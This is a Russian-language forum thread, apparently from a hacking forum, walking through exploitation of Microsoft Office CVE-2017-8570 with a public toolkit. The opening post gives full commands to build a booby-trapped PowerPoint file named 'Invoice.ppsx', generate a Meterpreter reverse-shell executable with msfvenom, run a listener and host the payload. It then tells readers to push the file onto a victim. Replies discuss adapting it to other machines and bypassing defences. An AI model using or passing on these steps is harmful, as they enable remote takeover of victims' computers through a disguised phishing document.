![]() |
Всем привет. Сегодня разберем такую уязвимость как Microsoft OfficeCVE 2017 8570.
Данная уязвимость довольно свежая, позволяет получить доступ к удаленной машине используя специально подготовленный файл PowerPoint, более подробно о ней можете почитать по ссылке: https://www.rapid7.com/db/vulnerabilities/msft-cve-2017-8570. Использована она может быть на следующих версиях:
И так поехали: 1. Заходим по ссылке https://github.com/tezukanice/Office8570 скачиваем, не забываем читать README.md , там будет рассмотрено три сценария атаки используя данную уязвимость. Мы в данной статье остановимся на первом сценарии. https://forum.antichat.xyz/attachmen...e9a13917d7.png Вкратце: - генерируем наш вредоносный PPSX файл, - создаем полезную нагрузку и запускаем слушатель. - запускаем сервер на 80 порту. Давайте непосредственно приступим к делу. Создаем в директории «Office8570» новую папку и назовем ее «template», далее переносим файл template.ppsx в эту папку. Если этого не сделать то при генерировании PPSX файла выскочит ошибка. https://forum.antichat.xyz/attachments/28959503/3.png 1.Сейчас генерируем наш PPSX файл, пишем в терминале в одну строчку следующее: Код: Код:
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.0.104/logo.dochttps://forum.antichat.xyz/attachmen...1025372184.png 2. Создаем полезную нагрузку,где будет создан файл shell.exe в каталоге tmp, в моем случае это будет выглядеть следующим образом: Код: Код:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -f exe > /tmp/shell.exeЗапускаем слушатель: Код: Код:
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.104; set LPORT 4444; run"Код: Код:
python cve-2017-8570_toolkit.py -M exp -e http://192.168.0.104/shell.exe -l /tmp/shell.exeДалее нам осталось впарить файл Invoice.ppsx , и как только его откроют ,с сервера погрузится наша полезная нагрузка. Всем хорошего вечера и удачного пентеста!!! |
Вот видео эксплуатации CVE 2017 8570:
|
Цитата:
Цитата:
|
Потому что утилита , настроена так, что бы подгружать полезную нагрузку с директории tmp.
автор это указал в одном из примеров. В самом коде утилиты я не разбирался.По идее думаю что можно настроить на любую директорию. |
Лучше спроси у ТС. Я честно скажу, что не "щупал" (не пробовал).
Но навскидку скажу, что этого требует сам эксплойт. https://github.com/tezukanice/Office8570/blob/master/cve-2017-8570_toolkit.py [doublepost=1503513879,1503513817][/doublepost] Цитата:
|
Ради любопытства глянул, код на питоне простой , директорию можно легко поменять...
|
Я писал не глядя, а потом посмотрел, чтобы убедиться - в точку!
|
Ду уж,парни наверное не сидят без дела.хотя уязвимости чуть более месяца.
|
А если я укажу ip по типу 192.168. , то допустим если я скину на другой PC будет работать?
|
Интересно, а можно ли его забайпасить
|
| Время: 16:39 |